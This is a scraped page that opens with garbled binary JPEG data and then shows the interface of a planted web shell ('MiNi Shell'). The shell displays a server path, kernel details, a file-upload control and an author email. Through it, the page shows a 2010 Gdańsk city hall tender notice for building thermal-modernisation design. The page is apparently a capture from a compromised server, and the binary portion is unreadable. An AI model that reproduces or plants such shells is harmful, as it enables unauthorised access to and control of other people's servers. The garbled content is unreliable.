JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100531/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100531/139769-N-2010.html

<p class="kh_header"><b>Gdańsk: Wykonanie opracowań: dokumentacji projektowej, specyfikacji technicznej  wykonywania i odbioru robót oraz kosztorysu inwestorskiego dla wykonania termomodernizacji budynku Urzędu Miejskiego w Gdańsku przy ul. Nowe Ogrody 8/12, wraz z pełnieniem nadzoru autorskiego</b><br>
<b>Numer ogłoszenia: 139769 - 2010; data zamieszczenia: 31.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasta Gdańsk Urząd Miejski w Gdańsku , ul. Nowe Ogrody 8/12, 80-803 Gdańsk, woj. pomorskie, tel. 58 3236129, faks 58 3236529.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gdansk.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie opracowań: dokumentacji projektowej, specyfikacji technicznej  wykonywania i odbioru robót oraz kosztorysu inwestorskiego dla wykonania termomodernizacji budynku Urzędu Miejskiego w Gdańsku przy ul. Nowe Ogrody 8/12, wraz z pełnieniem nadzoru autorskiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest wykonanie opracowań: dokumentacji projektowej, specyfikacji technicznej wykonywania i odbioru robót oraz kosztorysu inwestorskiego dla wykonania termomodernizacji budynku Urzędu Miejskiego w Gdańsku przy ul. Nowe Ogrody 8/12 wraz z pełnieniem nadzoru autorskiego.<br>
2.Nadzór autorski w okresie realizacji robót wykonywanych na podstawie dokumentacji określonej w Rozdziale 1 SIWZ, obejmować będzie czynności, o których mowa w § 1 ust. 2 wzoru umowy przedstawionego w Rozdziale 13 SIWZ.<br>
3.Opracowania wykonania termomodernizacja  budynku obejmują dokumentację projektową, służącą do opisu przedmiotu zamówienia na wykonanie robót budowlanych, dla których jest wymagane uzyskanie pozwolenia na budowę, składającą się w szczególności z:<br>
1)  koncepcji wstępnych,<br>
2)projektu budowlanego w zakresie uwzględniającym specyfikę robót budowlanych dla uzyskania decyzji pozwolenia na budowę oraz uzyskania decyzji Pomorskiego Wojewódzkiego Konserwatora Zabytków;<br>
3)projektu wykonawczego, czyli szkice rysunki określające rodzaj, zakres i sposób wykonywania robót budowlanych oraz ich uwarunkowań i dokładnej lokalizacji ich wykonania;<br>
Uwaga: projekt budowlany będzie  oddzielnym opracowaniem do projektu wykonawczego.<br>
4)przedmiaru robót;<br>
5)uzgodnień i opinii;<br>
6)informacji projektanta dotyczącej bezpieczeństwa i ochrony zdrowia.<br> 
4.Specyfikację techniczną wykonywania i odbioru robót: czyli opracowania zawierającego zbiory wymagań, które będą niezbędne do określenia standardu i jakości wykonywania robót budowlanych i instalacyjnych, w zakresie sposobu wykonywania robót, właściwości wyrobów oraz oceny prawidłowości wykonywania poszczególnych robót.<br>
5.Kosztorys inwestorski.<br>
6.Przedmiot zamówienia należy opracować, między innymi zgodnie z następującymi aktami prawnymi:<br>
- Ustawa z dnia 7 lipca 1994 r. Prawo budowlane (t.j. Dz. U. z 2006 r., Nr 156, poz. 1118 ze zm.<br>
- Ustawa z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (tj.:Dz.U  z 2007 r. Nr 223 poz.1655 ze zm.<br>
- Opracowania wykazane w ust. 3 i 4 muszą być wykonane zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. (Dz. U. Nr 202 poz. 2072) w sprawie szczegółowego zakresu i formy projektowej, specyfikacji technicznej wykonywania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego,<br>
- Opracowanie wykazane w ust. 5 według Rozporządzenia Ministra Infrastruktury z dnia 18 maja 2004 r. (Dz. U. Nr 130 poz. 1389) w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych  oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym.<br>
7.Przedmiot zamówienia powinien być przekazany w następującej ilości egzemplarzy:<br>
1)   dokumentacja projektowa :<br>
- projekt koncepcji wstępnych w 2 egzemplarzach,<br>
- projekt dla Pomorskiego Wojewódzkiego Konserwatora Zabytków dla uzyskania decyzji w 2 egzemplarzach,<br>
- projekt budowlany (oddzielne opracowania) dla uzyskania decyzji pozwolenia na budowę w ilości 5 egzemplarzy,<br>
- projekt wykonawczy w ilości 5 egzemplarzy,<br>
- przedmiar robót w ilości 5  egzemplarzy,<br>
2)specyfikacja techniczna wykonywania i odbioru robót w ilości 5 egzemplarzy,<br>
3) kosztorys inwestorski  w ilości 2 egzemplarzy,<br>
4)1 egzemplarz każdego opracowania w wersji elektronicznej nieedytowalnej.pdf<br>
5)1 egzemplarz każdego opracowania w wersji elektronicznej edytowalnej (doc, xls lub .odt .ods oraz dwg) <br>
8.Dodatkowe wymagania Zamawiającego odnośnie przedmiaru robót jako części składowej dokumentacji projektowej oraz kosztorysu inwestorskiego. Powyższe opracowania muszą uwzględniać podział nieruchomości na własność Gminy Miasta Gdańsk oraz stanowiącą współwłasność Gminy Miasta Gdańsk i  Banku Zachodniego WBK S.A.<br>
9.Zakres prac termomodernizacyjnych w szczególności wynikać musi z wykonanego audytu energetycznego, który stanowi załącznik do niniejszego opisu.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 150.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca przystępujący do postępowania obowiązany jest do wniesienia wadium w wysokości 8 000 zł (słownie osiem tysięcy złotych). Warunki wnoszenia wadium są szczegółowo określone w Rozdziale 5 Specyfikacji Istotnych Warunków Zamówienia</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich trzech lat zrealizował należycie co najmniej dwie usługi polegające na wykonaniu opracowań  dokumentacji projektowej, specyfikacji technicznej wykonywania i odbioru robót oraz kosztorysu inwestorskiego dla robót ocieplania budynku o powierzchni ocieplonej elewacji nie mniejszej niż 5000 m2.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli Wykonawca wskaże co najmniej:<br>
a) jedną osobę, która będzie uczestniczyć w wykonaniu zamówienia, posiadającą uprawnienia niezbędne do wykonania przedmiotu zamówienia tj. uprawnienia budowlane do projektowania w specjalności konstrukcyjno-budowlanej,<br>
b) jedną osobę, która będzie uczestniczyć w wykonaniu zamówienia, posiadającą uprawnienia niezbędne do wykonania przedmiotu zamówienia tj. uprawnienia budowlane do projektowania w specjalności architektonicznej,<br>
c) jedną osobę, która będzie uczestniczyć w wykonaniu zamówienia, posiadającą uprawnienia niezbędne do wykonania przedmiotu zamówienia tj. uprawnienia do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych,<br>
d) jedną osobę, która będzie uczestniczyć w wykonaniu zamówienia, posiadającą uprawnienia niezbędne do wykonania przedmiotu zamówienia tj. uprawnienia do projektowania w specjalności instalacyjnej w zakresie sieci instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Wszelkie zmiany zawartej umowy będą wymagały dla swojej ważności formy pisemnej. Zmiany   umowy mogą  dotyczyć:<br>
1)terminu realizacji zamówienia;<br>
2)wynagrodzenia;<br>
3)warunków płatności.<br>
2.Zmiany, o których mowa w ust. 1  mogą nastąpić w następujących sytuacjach:<br>
1)   zmiana terminu wykonania przedmiotu umowy może nastąpić w przypadku:<br>
a) wystąpienia siły wyższej t.j. katastrofa naturalna, strajk, pożar, eksplozja, wojna,  atak terrorystyczny pod warunkiem, że Wykonawca powiadomi na piśmie Zamawiającego o wystąpieniu zdarzenia siły wyższej nie później aniżeli w ciągu 2 dni od dnia w/w zdarzenia. Przesunięcie terminu następuje o ilość dni, w których zdarzenie siły wyższej wystąpiło;<br> 
b) udzielenia Wykonawcy zamówienia dodatkowego na podstawie art. 67 ust. 1 pkt 5 ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych (t.j. Dz. U. z 2007r. Nr 223 poz. 1655 z późn.zm.), jeżeli z powodu zamówienia dodatkowego  Wykonawca nie będzie mógł wykonać umowy w terminie, o którym mowa w § 2 pkt 3 niniejszej umowy. Przesunięcie terminu nastąpi o ilość dni, w których realizowane będzie zamówienie dodatkowe;<br>
    2)   zmiana wynagrodzenia i warunków płatności może nastąpić w przypadku zmiany stawki podatku od towarów i usług na dzień wystawienia faktury w stosunku do stawki obowiązującej w dniu podpisania umowy;<br>
     3)    gdy zmiany są korzystne dla Zamawiającego.<br>
3. Wykonawca wnioskujący o zmianę umowy, przedkłada Zamawiającemu pisemne uzasadnienie konieczności wprowadzenia zmian do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gdansk.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Biuro Zamówień Publicznych Urzędu Miejskiego w Gdańsku ul.Nowe Ogrody 8/12 80-803 Gdańsk, pokój 125.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.06.2010 godzina 12:00, miejsce: Urząd Miejski w Gdańsku ul. Nowe Ogrody 8/12; 80-803 Gdańsk, Sala Obsługi Mieszkańców stanowiska 13-17. Otwarcie ofert: 09.06.2010 r. godz.:12:30.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Zamawiający nie zamierza zawierać umowy ramowej ani ustanawiać dynamicznego systemu zakupów, a także nie przewiduje wyboru najkorzystniejszej oferty z zastosowaniem aukcji elektonicznej.<br>
2. Osobą uprawnioną do porozumiewania się z Wykonawcami jest: pracownik Biura Zamówień Publicznych Urzędu Miejskiego w Gdańsku Katarzyna Tarkowska pok. 125 tel.(058) 323 61 25, fax. (058) 323 64 81 e-mail: k.tarkowska@gdansk.gda.pl w godzinach od 8:00 do 16:00 w poniedziałki, wtorki i czwartki; w godzinach od 8:00 do 17:00 w środy; w godzinach od 8:00 do 15:00 w piątki.<br>
3. Sygnatura postępowania: BZP-341-044/WKiO/10/KT.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com